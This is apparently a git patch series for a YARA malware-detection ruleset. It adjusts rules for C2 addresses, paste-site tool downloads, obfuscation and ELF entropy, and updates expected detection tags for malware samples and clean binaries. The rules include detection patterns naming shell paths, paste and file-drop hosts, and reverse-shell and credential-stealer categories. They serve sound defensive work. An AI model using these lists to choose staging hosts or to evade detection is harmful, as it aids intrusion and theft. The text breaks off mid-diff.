100644 --- a/tests/macOS/clean/ls.sdiff.trigger_2 +++ b/tests/macOS/clean/ls.sdiff.trigger_2 @@ -3,7 +3,6 @@ -discover/system/hostname_get -exec/shell/TERM -fs/link_read --lateral/scan/tool -net/url/embedded -process/name_set ++++ added: ls diff --git a/tests/macOS/clean/ls.sdiff.trigger_3 b/tests/macOS/clean/ls.sdiff.trigger_3 index 3ed486b6c..9e0e93a9c 100644 --- a/tests/macOS/clean/ls.sdiff.trigger_3 +++ b/tests/macOS/clean/ls.sdiff.trigger_3 @@ -3,7 +3,6 @@ -discover/system/hostname_get -exec/shell/TERM -fs/link_read --lateral/scan/tool -net/url/embedded -process/name_set ++++ added: ls diff --git a/tests/npm/2024.harthat/deference.js.simple b/tests/npm/2024.harthat/deference.js.simple index 9c67ea4d0..96d9cf0f3 100644 --- a/tests/npm/2024.harthat/deference.js.simple +++ b/tests/npm/2024.harthat/deference.js.simple @@ -1,6 +1,6 @@ # npm/2024.harthat/deference.js: critical c2/addr/ip: high -c2/addr/url: high +c2/addr/url: medium discover/system/platform: medium evasion/indicator_blocking/echo_off: high fs/file/delete: medium diff --git a/tests/npm/2024.next-react-notify/tocall.js.simple b/tests/npm/2024.next-react-notify/tocall.js.simple index 094947a69..60a0942ec 100644 --- a/tests/npm/2024.next-react-notify/tocall.js.simple +++ b/tests/npm/2024.next-react-notify/tocall.js.simple @@ -1,7 +1,7 @@ # npm/2024.next-react-notify/tocall.js: critical anti-static/obfuscation/powershell: critical c2/addr/ip: high -c2/addr/url: high +c2/addr/url: medium discover/system/platform: medium evasion/bypass_security/executionpolicy_bypass: high evasion/indicator_blocking/echo_off: high diff --git a/tests/php/2024.sagsooz/2024.php.simple b/tests/php/2024.sagsooz/2024.php.simple index cbfd6bcef..3789511f5 100644 --- a/tests/php/2024.sagsooz/2024.php.simple +++ b/tests/php/2024.sagsooz/2024.php.simple @@ -5,6 +5,7 @@ data/base64/decode: medium data/embedded/base64_url: medium data/embedded/html: medium data/encoding/base64: low +discover/process/effective_groupid_get: medium evasion/indicator_blocking/mask_exceptions: medium evasion/time/php_no_limit: medium exec/shell/command: medium @@ -17,4 +18,3 @@ net/http/form_upload: medium net/http/post: medium net/url/embedded: low net/url/encode: medium -process/effective_groupid_get: medium diff --git a/tests/php/clean/run-tests.php.simple b/tests/php/clean/run-tests.php.simple index d6586237e..55d7d2da0 100644 --- a/tests/php/clean/run-tests.php.simple +++ b/tests/php/clean/run-tests.php.simple @@ -18,7 +18,6 @@ fs/symlink_resolve: low fs/tempdir: low fs/tempdir/TEMP: low impact/remote_access/reverse_shell: medium -lateral/scan/tool: medium net/http/cookies: medium net/http/form_upload: medium net/http/post: medium diff --git a/tests/python/2021.DiscordSafety/setup.py.simple b/tests/python/2021.DiscordSafety/setup.py.simple index 32765505a..b6ef8b6f4 100644 --- a/tests/python/2021.DiscordSafety/setup.py.simple +++ b/tests/python/2021.DiscordSafety/setup.py.simple @@ -2,7 +2,7 @@ anti-static/obfuscation/hex: medium anti-static/obfuscation/python: critical anti-static/unmarshal/marshal: high -c2/addr/url: high +c2/addr/url: medium collect/databases/leveldb: medium data/encoding/base64: low data/encoding/marshal: medium diff --git a/tests/python/2024.Custom.RAT/output.py.simple b/tests/python/2024.Custom.RAT/output.py.simple index cf8b7e468..fe9eedbe5 100644 --- a/tests/python/2024.Custom.RAT/output.py.simple +++ b/tests/python/2024.Custom.RAT/output.py.simple @@ -15,6 +15,7 @@ data/encoding/json_decode: low discover/ip/geo: high discover/ip/public: high discover/network/interface_list: medium +discover/process/name_get: medium discover/system/network: high discover/system/platform: medium discover/system/sysinfo: medium @@ -52,5 +53,4 @@ os/fd/write: low persist/daemon: medium privesc/uac_bypass: high process/multithreaded: medium -process/name_get: medium process/terminate/taskkill: high diff --git a/tests/python/clean/numpy/misc_util.py.simple b/tests/python/clean/numpy/misc_util.py.simple index 6907bcce7..8ccb1207f 100644 --- a/tests/python/clean/numpy/misc_util.py.simple +++ b/tests/python/clean/numpy/misc_util.py.simple @@ -18,6 +18,7 @@ fs/path/usr_lib_python: medium fs/path/usr_local: medium fs/symlink_resolve: low fs/tempdir/create: low +hw/dev/ubi: low net/ip/spoof: medium net/url/embedded: low os/env/get: low diff --git a/tests/python/clean/versioneer/versioneer.py.simple b/tests/python/clean/versioneer/versioneer.py.simple index 08ebb2614..b075018d3 100644 --- a/tests/python/clean/versioneer/versioneer.py.simple +++ b/tests/python/clean/versioneer/versioneer.py.simple @@ -6,4 +6,5 @@ data/embedded/base64_url: medium data/encoding/base64: low fs/file/open: low fs/path/usr_bin: low +hw/dev/ubi: low os/fd/write: low diff --git a/tests/windows/2024.GitHub.Clipper/raw.py.simple b/tests/windows/2024.GitHub.Clipper/raw.py.simple index 4879f9c77..821ae34d9 100644 --- a/tests/windows/2024.GitHub.Clipper/raw.py.simple +++ b/tests/windows/2024.GitHub.Clipper/raw.py.simple @@ -1,5 +1,5 @@ # windows/2024.GitHub.Clipper/raw.py: critical -c2/addr/url: high +c2/addr/url: medium c2/tool_transfer/download: high c2/tool_transfer/exe_url: high c2/tool_transfer/python: high diff --git a/tests/windows/2024.aspdasdksa2/creal.exe.simple b/tests/windows/2024.aspdasdksa2/creal.exe.simple index 7705f417c..d6c10054b 100644 --- a/tests/windows/2024.aspdasdksa2/creal.exe.simple +++ b/tests/windows/2024.aspdasdksa2/creal.exe.simple @@ -18,7 +18,6 @@ fs/file/delete: medium fs/file/read: low fs/file/write: low fs/path/relative: medium -lateral/scan/tool: medium net/dns/txt: low net/url/embedded: low net/url/parse: low diff --git a/tests/windows/2024.aspdasdksa2/creal.pyc.simple b/tests/windows/2024.aspdasdksa2/creal.pyc.simple index fae239ad2..35c4226f7 100644 --- a/tests/windows/2024.aspdasdksa2/creal.pyc.simple +++ b/tests/windows/2024.aspdasdksa2/creal.pyc.simple @@ -26,7 +26,6 @@ exfil/stealer/credit_card: medium exfil/stealer/creds: high exfil/stealer/discord: high exfil/stealer/wallet: critical -lateral/scan/tool: medium net/download: medium net/download/fetch: medium net/http/fake_user_agent: medium From 6461bc0c7aaa2d811bf918a9aecfcc2b1483a5d5 Mon Sep 17 00:00:00 2001 From: Thomas Stromberg Date: Sat, 9 Nov 2024 22:06:29 -0500 Subject: [PATCH 3/7] further rule tuning --- pkg/action/testdata/scan_archive | 3 +- rules/anti-static/elf/entropy.yara | 7 +- rules/anti-static/elf/header.yara | 3 +- rules/anti-static/elf/tiny.yara | 7 +- rules/anti-static/macho/tiny.yara | 1 - rules/anti-static/obfuscation/bitwise.yara | 28 ++- rules/anti-static/obfuscation/hex.yara | 15 +- rules/anti-static/obfuscation/python.yara | 8 +- rules/anti-static/packer/cx_freeze.yara | 5 +- rules/anti-static/packer/high_entropy.yara | 27 --- rules/c2/addr/ip.yara | 30 +-- rules/c2/addr/server.yara | 28 +-- rules/c2/addr/url.yara | 29 ++- rules/c2/server_address.yara | 16 -- rules/c2/tool_transfer/download.yara | 9 +- rules/c2/tool_transfer/shell.yara | 2 +- rules/credential/ssh/ssh.yara | 16 +- .../process/{name-get.yara => name.yara} | 0 .../{parent_pid-get.yara => parent.yara} | 0 rules/discover/system/dev_full.yara | 10 + rules/discover/system/proc.yara | 20 ++ rules/discover/system/system_network.yara | 17 +- .../evasion/file/location/chdir-unusual.yara | 5 +- rules/evasion/file/location/x11-unix.yara | 3 +- rules/evasion/file/prefix/prefix.yara | 2 +- rules/evasion/file/prefix/tmp.yara | 17 ++ .../hijack_execution/etc-ld.so.preload.yara | 3 +- rules/evasion/logging/dev_log.yara | 10 + rules/evasion/logging/syslog.yara | 1 + rules/evasion/mimicry/fake-library.yara | 5 +- rules/evasion/net/http_443.yara | 3 +- rules/evasion/process_injection/ptrace.yara | 23 ++- rules/evasion/rootkit/linux_kernel.yara | 3 +- rules/exec/shell/bash_dev_tcp.yara | 8 +- rules/exec/shell/sighup_trap.yara | 9 +- rules/exfil/stealer/pam.yara | 5 +- rules/false_positives/libdw.yara | 5 +- rules/false_positives/linux_src.yara | 1 - rules/false_positives/slirp.yara | 1 + rules/false_positives/snapd.yara | 5 +- rules/false_positives/sudo.yara | 9 +- rules/false_positives/vmtools.yara | 8 +- .../permission-modify-dangerous.yara | 3 +- rules/fs/proc/arbitrary-pid.yara | 4 +- rules/fs/proc/pid-exe.yara | 26 ++- rules/hw/dev/kmem.yara | 1 + rules/hw/dev/sd_mmc.yara | 3 +- rules/hw/dev/ubi.yara | 23 ++- rules/impact/degrade/firewall.yara | 3 +- rules/impact/exploit/GCONV_PATH.yara | 2 +- rules/impact/remote_access/backdoor.yara | 6 +- rules/impact/remote_access/net_term.yara | 3 +- rules/impact/remote_access/py_setuptools.yara | 2 +- rules/impact/remote_access/reverse_shell.yara | 4 +- rules/net/download/fetch.yara | 36 ++-- rules/net/ftp/tftp.yara | 11 + .../persist/kernel_module/symbol-lookup.yara | 3 +- rules/persist/sysv/sysv.yara | 11 + ...4796BB27126E03A7E25DD5D589.cache.js.simple | 3 +- ...D016DDDA0665CB8CD8EEA6C537.cache.js.simple | 4 +- tests/javascript/clean/mode-php.js.simple | 2 +- .../clean/mode-php_laravel_blade.js.simple | 2 +- tests/javascript/clean/php.js.simple | 2 +- .../2022.bpfdoor/2023.ConnectBack/tiny.md | 9 +- tests/linux/2023.ConnectBack/tiny.md | 9 +- tests/linux/2023.Kinsing/install.sh.simple | 2 +- .../eight-nebraska-autumn-illinois.simple | 2 +- tests/linux/2024.gas/gas.simple | 3 +- tests/linux/2024.kubo_injector/injector.json | 11 - .../emp3r0r.agent.simple | 2 +- .../2024.kworker_pretenders/gafgyt.simple | 2 +- tests/linux/2024.medusa/rkload.simple | 3 +- tests/linux/2024.sbcl.market/sbcl.sdiff | 2 +- ...5d0e2031551f9f1a70b6db475ba71b2.elf.simple | 4 +- tests/linux/UPX/06ed158.md | 16 +- tests/linux/clean/appsec-rules.json.simple | 4 +- tests/linux/clean/busybox.simple | 2 +- tests/linux/clean/caddy.simple | 2 +- tests/linux/clean/chezmoi.simple | 2 +- tests/linux/clean/chrome.simple | 7 +- tests/linux/clean/clickhouse.simple | 4 +- tests/linux/clean/code-oss.md | 7 +- tests/linux/clean/containerd.simple | 2 +- tests/linux/clean/default_config.json.simple | 4 +- ...735-4b24-9cc6-c78dfc9fc9c9_108.json.simple | 1 - .../kibana/securitySolution.chunk.9.js.simple | 4 +- tests/linux/clean/kuma-cp.simple | 2 +- tests/linux/clean/ld-2.27.so.simple | 3 +- tests/linux/clean/libgcj.so.17.0.0.simple | 4 +- tests/linux/clean/libgcj.so.17.simple | 4 +- tests/linux/clean/libsystemd.so.0.simple | 2 +- tests/linux/clean/ls.x86_64.md | 1 + tests/linux/clean/lslogins.md | 1 + tests/linux/clean/mongosh.simple | 6 +- tests/linux/clean/nvim.simple | 1 - tests/linux/clean/pandoc.md | 7 +- tests/linux/clean/pulumi.simple | 4 +- tests/linux/clean/qemu-system-xtensa.md | 191 +++++++++--------- tests/linux/clean/redis-server.aarch64.md | 97 ++++----- tests/linux/clean/rules.json.simple | 4 +- tests/linux/clean/slack.md | 7 +- tests/linux/clean/slirp4netns.simple | 8 +- tests/linux/clean/sudo.simple | 4 +- tests/linux/clean/tracer.o.aarch64.simple | 1 + tests/linux/clean/trivy.simple | 5 +- tests/linux/clean/trufflehog.md | 5 +- .../mimipenguin/python/mimipenguin.simple | 2 +- tests/macOS/2024.LightSpy/dropper.simple | 2 +- tests/macOS/clean/ls.mdiff | 1 + tests/macOS/clean/ls.sdiff.trigger_2 | 1 + tests/macOS/clean/ls.sdiff.trigger_3 | 1 + tests/npm/2024.testerrrrrrrrrr/init.js.simple | 2 +- .../valyrian_debug_setup.py.simple | 5 +- tests/python/2024.Custom.RAT/output.py.simple | 2 +- tests/python/clean/hatch/migrate.py.simple | 2 +- tests/python/clean/numba/support.py.simple | 2 +- .../clean/setuptools/namespaces.py.simple | 2 +- .../windows/2024.aspdasdksa2/creal.exe.simple | 1 + 118 files changed, 579 insertions(+), 466 deletions(-) delete mode 100644 rules/anti-static/packer/high_entropy.yara delete mode 100644 rules/c2/server_address.yara rename rules/discover/process/{name-get.yara => name.yara} (100%) rename rules/discover/process/{parent_pid-get.yara => parent.yara} (100%) create mode 100644 rules/discover/system/dev_full.yara create mode 100644 rules/discover/system/proc.yara create mode 100644 rules/evasion/file/prefix/tmp.yara create mode 100644 rules/evasion/logging/dev_log.yara create mode 100644 rules/net/ftp/tftp.yara create mode 100644 rules/persist/sysv/sysv.yara diff --git a/pkg/action/testdata/scan_archive b/pkg/action/testdata/scan_archive index 1fb170804..10a7a0e46 100644 --- a/pkg/action/testdata/scan_archive +++ b/pkg/action/testdata/scan_archive @@ -1,6 +1,6 @@ # testdata/apko_nested.tar.gz ∴ /apko_0.13.2_linux_arm64/apko: medium c2/addr/ip: medium -c2/server_address: medium +c2/addr/server: medium collect/archives/zip: medium credential/keychain: medium credential/password: low @@ -34,6 +34,7 @@ discover/user/name_get: medium evasion/bypass_security/linux/se: medium evasion/file/prefix: medium evasion/hide_artifacts/pivot_root: medium +evasion/process_injection/ptrace: low exec/plugin: low exec/program: medium exec/shell/background_sleep: medium diff --git a/rules/anti-static/elf/entropy.yara b/rules/anti-static/elf/entropy.yara index 72cfcf6d9..e47b11a12 100644 --- a/rules/anti-static/elf/entropy.yara +++ b/rules/anti-static/elf/entropy.yara @@ -18,10 +18,13 @@ rule normal_elf_high_entropy_7: medium { normal_elf and math.entropy(1, filesize) >= 7.1 } -rule normal_elf_high_entropy_7_2: high { +rule normal_elf_high_entropy_7_4: high { meta: description = "high entropy ELF binary (>7.4)" + strings: + $not_whirlpool = "libgcrypt-grub/cipher/whirlpool.c" + condition: - normal_elf and math.entropy(1, filesize) >= 7.4 + normal_elf and math.entropy(1, filesize) >= 7.4 and none of ($not*) } diff --git a/rules/anti-static/elf/header.yara b/rules/anti-static/elf/header.yara index bb8f24f25..3cd577aee 100644 --- a/rules/anti-static/elf/header.yara +++ b/rules/anti-static/elf/header.yara @@ -40,7 +40,6 @@ rule fake_dynamic_symbols: critical { elf.type == elf.ET_EXEC and elf.entry_point < filesize and elf.number_of_sections > 0 and elf.dynamic_section_entries > 0 and for any i in (0..elf.dynamic_section_entries): (elf.dynamic[i].type == elf.DT_SYMTAB and not (for any j in (0..elf.number_of_sections): (elf.sections[j].type == elf.SHT_DYNSYM and for any k in (0..elf.number_of_segments): ((elf.segments[k].virtual_address <= elf.dynamic[i].val) and ((elf.segments[k].virtual_address + elf.segments[k].file_size) >= elf.dynamic[i].val) and (elf.segments[k].offset + (elf.dynamic[i].val - elf.segments[k].virtual_address)) == elf.sections[j].offset)))) } - rule high_entropy_header: high { meta: description = "high entropy ELF header (>7)" @@ -52,7 +51,7 @@ rule high_entropy_header: high { $not_pyinst = "pyi-bootloader-ignore-signals" $not_go = "syscall_linux.go" $not_go2 = "vdso_linux.go" - $not_module = ".module_license" fullword + $not_module = ".module_license" fullword condition: uint32(0) == 1179403647 and elf.type == elf.ET_EXEC and math.entropy(1200, 4096) > 7 and none of ($not*) diff --git a/rules/anti-static/elf/tiny.yara b/rules/anti-static/elf/tiny.yara index 311e888cc..48edec212 100644 --- a/rules/anti-static/elf/tiny.yara +++ b/rules/anti-static/elf/tiny.yara @@ -4,6 +4,9 @@ rule impossibly_small_elf_program: high { meta: description = "ELF binary is unusually small" + strings: + $not_hello_c = "hello.c" + condition: - filesize < 8192 and uint32(0) == 1179403647 and elf.type == elf.ET_EXEC -} \ No newline at end of file + filesize < 8192 and filesize > 900 and uint32(0) == 1179403647 and elf.type == elf.ET_EXEC and none of ($not*) +} diff --git a/rules/anti-static/macho/tiny.yara b/rules/anti-static/macho/tiny.yara index e36911bd8..6f50f3f43 100644 --- a/rules/anti-static/macho/tiny.yara +++ b/rules/anti-static/macho/tiny.yara @@ -1,4 +1,3 @@ - rule impossibly_small_macho_program: medium { meta: description = "machO binary is unusually small" diff --git a/rules/anti-static/obfuscation/bitwise.yara b/rules/anti-static/obfuscation/bitwise.yara index 72201b846..0863d03fd 100644 --- a/rules/anti-static/obfuscation/bitwise.yara +++ b/rules/anti-static/obfuscation/bitwise.yara @@ -22,17 +22,23 @@ rule excessive_bitwise_math: high { hash_2023_aiohttpp_0_1_setup = "cfa4137756f7e8243e7c7edc7cb0b431a2f4c9fa401f2570f1b960dbc86ca7c6" strings: - $x = /\-{0,1}[\da-z]{1,8} \<\< \-{0,1}\d{1,8}/ - $not_Sodium = "Sodium_Core" - $not_SHA512 = "SHA512" - $not_SHA256 = "SHA256" - $not_MD4 = "MD4" - $not_algbase = "algbase" fullword - $not_jslint = "jslint bitwise" - $not_include = "#define " - $not_bitwise = "bitwise" fullword - $not_bitmasks = "bitmasks" fullword - $not_ckbcomp = "ckbcomp" fullword + $x = /\-{0,1}[\da-z]{1,8} \<\< \-{0,1}\d{1,8}/ + $not_Sodium = "Sodium_Core" + $not_SHA512 = "SHA512" + $not_SHA256 = "SHA256" + $not_MD4 = "MD4" + $not_algbase = "algbase" fullword + $not_jslint = "jslint bitwise" + $not_include = "#define " + $not_bitwise = "bitwise" fullword + $not_bitmasks = "bitmasks" fullword + $not_ckbcomp = "ckbcomp" fullword + $not_bit_test = "bits_test" fullword + $not_testing = "*testing.T" + $not_effective_bits = "effective bits" + $not_bit_offsets = "bit offsets" + $not_uuid = "uuid" fullword + condition: filesize < 192KB and #x > 64 and none of ($not*) } diff --git a/rules/anti-static/obfuscation/hex.yara b/rules/anti-static/obfuscation/hex.yara index 830f2758c..9e7585e13 100644 --- a/rules/anti-static/obfuscation/hex.yara +++ b/rules/anti-static/obfuscation/hex.yara @@ -51,13 +51,14 @@ rule hex_parse_base64_high: high { hash_1985_package_index = "8d4daa082c46bfdef3d85a6b5e29a53ae4f45197028452de38b729d76d3714d1" strings: - $lang_node = /Buffer\.from\(\w{0,16}, {0,2}'hex'\)/ - $lang_python = /\.unhexlify\(/ - $b_base64 = "base64" - $b_b64decode = "b64decode" - $not_sha256 = "sha256" fullword - $not_sha512 = "sha512" fullword - $not_algorithms = "algorithms" fullword + $lang_node = /Buffer\.from\(\w{0,16}, {0,2}'hex'\)/ + $lang_python = /\.unhexlify\(/ + $b_base64 = "base64" + $b_b64decode = "b64decode" + $not_sha256 = "sha256" fullword + $not_sha512 = "sha512" fullword + $not_algorithms = "algorithms" fullword + $not_python_base64 = "return binascii.unhexlify(s)" condition: filesize < 32KB and any of ($lang*) and any of ($b*) and none of ($not*) diff --git a/rules/anti-static/obfuscation/python.yara b/rules/anti-static/obfuscation/python.yara index 20567d367..16d69cf7c 100644 --- a/rules/anti-static/obfuscation/python.yara +++ b/rules/anti-static/obfuscation/python.yara @@ -220,8 +220,11 @@ rule fernet_base64: high { $o6 = "exec(" $o7 = "eval(" + $not_utils = "from cryptography import utils" + $not_fernet_itself = "class Fernet" + condition: - filesize < 2MB and any of ($fernet*) and any of ($bdecode*) and any of ($o*) + filesize < 2MB and any of ($fernet*) and any of ($bdecode*) and any of ($o*) and none of ($not*) } rule python_long_hex: medium { @@ -261,7 +264,8 @@ rule python_hex_decimal: high { $trash = /\\x{0,1}\d{1,3}\\/ - $not_testing_t = "*testing.T" fullword + $not_testing_t = "*testing.T" fullword + condition: filesize < 1MB and any of ($f*) and #trash in (filesize - 1024..filesize) > 100 and none of ($not*) } diff --git a/rules/anti-static/packer/cx_freeze.yara b/rules/anti-static/packer/cx_freeze.yara index 9240d050c..5de1b23a8 100644 --- a/rules/anti-static/packer/cx_freeze.yara +++ b/rules/anti-static/packer/cx_freeze.yara @@ -3,8 +3,9 @@ rule cxFreeze_Python_executable: high { hash_2023_MacStealer_weed = "6a4f8b65a568a779801b72bce215036bea298e2c08ec54906bb3ebbe5c16c712" strings: - $cxfreeze = "cx_Freeze" + $cxfreeze = "cx_Freeze" + $not_importlib = "tool like cx_Freeze" condition: - filesize < 10485760 and $cxfreeze + filesize < 10485760 and $cxfreeze and none of ($not*) } diff --git a/rules/anti-static/packer/high_entropy.yara b/rules/anti-static/packer/high_entropy.yara deleted file mode 100644 index ec1c7673a..000000000 --- a/rules/anti-static/packer/high_entropy.yara +++ /dev/null @@ -1,27 +0,0 @@ -import "math" - -private rule smallBinary { - condition: - // matches ELF or machO binary - filesize < 64MB and (uint32(0) == 1179403647 or uint32(0) == 4277009102 or uint32(0) == 3472551422 or uint32(0) == 4277009103 or uint32(0) == 3489328638 or uint32(0) == 3405691582 or uint32(0) == 3199925962) -} - -rule high_entropy_7_5: medium { - meta: - description = "higher entropy binary (>7.5)" - - condition: - smallBinary and math.entropy(1, filesize) >= 7.5 -} - -rule high_entropy_7_9: high { - meta: - description = "high entropy binary (>7.9)" - - strings: - // prevent bazel false positive - $bin_java = "bin/java" - - condition: - smallBinary and math.entropy(1, filesize) >= 7.9 and not $bin_java -} diff --git a/rules/c2/addr/ip.yara b/rules/c2/addr/ip.yara index fae0a09d4..561bc67e1 100644 --- a/rules/c2/addr/ip.yara +++ b/rules/c2/addr/ip.yara @@ -30,17 +30,18 @@ rule elf_hardcoded_ip: high { strings: // stricter version of what's above: excludes 255.* and *.0.* *.1.*, and 8.* (likely Google) - $sus_ipv4 = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2345679])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])/ fullword - $not_version = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])[\.\-]/ - $not_incr = "10.11.12.13" - $not_169 = "169.254.169.254" - $not_spyder = "/search/spider" - $not_ruby = "210.251.121.214" - $not_1_2_3_4 = "1.2.3.4" - $not_root_servers_h = "128.63.2.53" - $not_root_servers_i = "192.36.148.17" - $not_123456789 = "123.45.67.89" - $not_libebt_among_init = "libebt_among_init" + $sus_ipv4 = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2345679])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])/ fullword + $not_version = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])[\.\-]/ + $not_incr = "10.11.12.13" + $not_169 = "169.254.169.254" + $not_spyder = "/search/spider" + $not_ruby = "210.251.121.214" + $not_1_2_3_4 = "1.2.3.4" + $not_root_servers_h = "128.63.2.53" + $not_root_servers_i = "192.36.148.17" + $not_123456789 = "123.45.67.89" + $not_libebt_among_init = "libebt_among_init" + condition: filesize < 12MB and uint32(0) == 1179403647 and 1 of ($sus_ip*) and none of ($not*) } @@ -82,9 +83,10 @@ rule hardcoded_ip_port: high { $not_wireguard = "127.212.121.99:999" $not_minio = "172.16.34.31:9000" $not_test = "def test_" fullword - $not_12 = "12.12.12.12:" - $not_21 = "21.21.21.21:" - $not_255 = "255.255.255.255:" + $not_12 = "12.12.12.12:" + $not_21 = "21.21.21.21:" + $not_255 = "255.255.255.255:" + condition: any of ($ip*) and none of ($not*) } diff --git a/rules/c2/addr/server.yara b/rules/c2/addr/server.yara index c45a2b497..b271b37fd 100644 --- a/rules/c2/addr/server.yara +++ b/rules/c2/addr/server.yara @@ -1,21 +1,19 @@ -rule server_addr: medium { +rule server_address: medium { meta: - description = "may execute a shell and communicate with a server" + description = "references a 'server address', possible C2 client" + hash_2024_Downloads_3105 = "31054fb826b57c362cc0f0dbc8af15b22c029c6b9abeeee9ba8d752f3ee17d7d" + hash_2023_Linux_Malware_Samples_450a = "450a7e35f13b57e15c8f4ce1fa23025a7c313931a394c40bd9f3325b981eb8a8" + hash_2023_Linux_Malware_Samples_458e = "458e3e66eff090bc5768779d5388336c8619a744f486962f5dfbf436a524ee04" strings: - $serverAddr = "serverAddr" - $server_addr = "server_addr" - $exec = "exec" - $sh = "/bin/sh" fullword - $sh_bash = "/bin/bash" fullword - $sh_zsh = "/bin/zsh" fullword - $sh_script = "ShellScript" - $sh_exec = "ExecShell" - $sh_cmd = "cmd.exe" - $sh_powershell = "powershell.exe" + $s_underscores = /\w{0,32}server_addr\w{0,32}/ + $s_mixed = /\w{0,32}serverAddr\w{0,32}/ + $s_url = "serverURL" fullword + $s_url2 = "serverUrl" fullword + $s_connect = /\w{0,32}ConnectServer\w{0,32}/ condition: - filesize < 10MB and any of ($server*) and $exec and any of ($sh*) + any of ($s*) } rule server_addr_small: high { @@ -34,6 +32,8 @@ rule server_addr_small: high { $sh_cmd = "cmd.exe" $sh_powershell = "powershell.exe" + $hash_bang = "#!" + condition: - filesize < 128KB and any of ($server*) and $exec and any of ($sh*) + filesize < 1MB and any of ($server*) and $exec and any of ($sh*) and not $hash_bang in (0..3) } diff --git a/rules/c2/addr/url.yara b/rules/c2/addr/url.yara index dd456fc0f..9a05c77c9 100644 --- a/rules/c2/addr/url.yara +++ b/rules/c2/addr/url.yara @@ -25,15 +25,12 @@ rule exotic_tld: high { $not_gov_bd = ".gov.bd" $not_eol = "endoflife.date" $not_whois = "bdia.btcl.com.bd" - $not_arduino = "arduino.cc" + $not_arduino = "arduino.cc" condition: filesize < 10MB and any of ($http*) and none of ($not_*) } - - - rule http_url_with_question: medium { meta: description = "contains hardcoded endpoint with a question mark" @@ -50,7 +47,7 @@ rule http_url_with_question: medium { $ref = /https*:\/\/[\w\.\/]{8,160}\.[a-zA-Z]{2,3}\?[\w\=\&]{0,32}/ $not_cvs_sourceforge = /cvs.sourceforge.net.{0,64}\?rev=/ $not_rev_head = "?rev=HEAD" - $not_cgi = ".cgi?" + $not_cgi = ".cgi?" condition: filesize < 256KB and any of ($f*) and $ref and none of ($not*) @@ -61,7 +58,8 @@ rule binary_php_url_with_question: high { description = "contains hardcoded endpoint with a question mark" strings: - $ref = /https*:\/\/[\w\.\/]{8,160}\.php\?[\w\=\&]{0,32}/ + $ref = /https*:\/\/[\w\.\/]{8,160}\.php\?[\w\=\&]{0,32}/ + condition: filesize < 150MB and elf_or_macho and $ref } @@ -71,15 +69,16 @@ rule script_php_url_with_question: medium { description = "contains hardcoded endpoint with a question mark" strings: - $f_import = "import" fullword - $f_require = "require" fullword - $f_curl = "curl" fullword - $f_wget = "wget" fullword - $f_requests = "requests.get" fullword - $f_requests_post = "requests.post" fullword - $f_urllib = "urllib.request" fullword - $f_urlopen = "urlopen" fullword - $ref = /https*:\/\/[\w\.\/]{8,160}\.php\?[\w\=\&]{0,32}/ + $f_import = "import" fullword + $f_require = "require" fullword + $f_curl = "curl" fullword + $f_wget = "wget" fullword + $f_requests = "requests.get" fullword + $f_requests_post = "requests.post" fullword + $f_urllib = "urllib.request" fullword + $f_urlopen = "urlopen" fullword + $ref = /https*:\/\/[\w\.\/]{8,160}\.php\?[\w\=\&]{0,32}/ + condition: filesize < 256KB and any of ($f*) and $ref } diff --git a/rules/c2/server_address.yara b/rules/c2/server_address.yara deleted file mode 100644 index 2504fbc73..000000000 --- a/rules/c2/server_address.yara +++ /dev/null @@ -1,16 +0,0 @@ -rule server_address: medium { - meta: - description = "references a 'server address', possible C2 client" - hash_2024_Downloads_3105 = "31054fb826b57c362cc0f0dbc8af15b22c029c6b9abeeee9ba8d752f3ee17d7d" - hash_2023_Linux_Malware_Samples_450a = "450a7e35f13b57e15c8f4ce1fa23025a7c313931a394c40bd9f3325b981eb8a8" - hash_2023_Linux_Malware_Samples_458e = "458e3e66eff090bc5768779d5388336c8619a744f486962f5dfbf436a524ee04" - - strings: - $underscores = /\w{0,32}server_addr\w{0,32}/ - $mixed = /\w{0,32}serverAddr\w{0,32}/ - $url = "serverURL" fullword - $url2 = "serverUrl" fullword - - condition: - any of them -} diff --git a/rules/c2/tool_transfer/download.yara b/rules/c2/tool_transfer/download.yara index 3686d3042..a800bb59e 100644 --- a/rules/c2/tool_transfer/download.yara +++ b/rules/c2/tool_transfer/download.yara @@ -7,18 +7,19 @@ rule download_sites: high { hash_2024_2024_GitHub_Clipper_raw = "e9f89885876c1958bc6eede3373e4f3c4d76a5bc35a247fb7531b757798cb032" strings: - $d_privatebin = /[\w\.]+privatebin[\w\.]+/ - $d_pastecode_dot = /pastecode\.[\w\.]+/ + $d_privatebin = /[\w\.]+privatebin[\w\.]{1,4}\// + $d_pastecode_dot = /pastecode\.[\w\.]{2,16}/ + $d_paste_dot = /\/paste\.[\w\.]{2,3}\// $d_discord = "cdn.discordapp.com" $d_pastebinger = "paste.bingner.com" $d_transfer_sh = "transfer.sh" $d_rentry = "rentry.co" fullword - $d_pastebin = /pastebin\.[\w]{2,3}/ fullword + $d_pastebin = /pastebin\.[\w]{2,3}[\w\/]{0,16}/ fullword $d_penyacom = "penyacom" $d_controlc = "controlc.com" $d_anotepad = "anotepad.com" $d_privnote = "privnote.com" - $d_hushnote = "hushnote" + $d_hushnote = /hushnote[\.\w\/]{3,16}/ $not_mozilla = "download.mozilla.org" $not_google = "dl.google.com" $not_manual = "manually upload" diff --git a/rules/c2/tool_transfer/shell.yara b/rules/c2/tool_transfer/shell.yara index 802c8bbda..45b6c3ed1 100644 --- a/rules/c2/tool_transfer/shell.yara +++ b/rules/c2/tool_transfer/shell.yara @@ -168,7 +168,7 @@ rule possible_dropper: high { $cmd_rm = "rm" fullword $cmd_sleep = "sleep" fullword $cmd_echo = "echo" fullword - $chmod = "chmod" fullword + $chmod = "chmod" fullword condition: filesize < 1KB and any of ($http*) and $chmod and any of ($tool*) and any of ($cmd*) diff --git a/rules/credential/ssh/ssh.yara b/rules/credential/ssh/ssh.yara index 70f1b84fd..35321cf07 100644 --- a/rules/credential/ssh/ssh.yara +++ 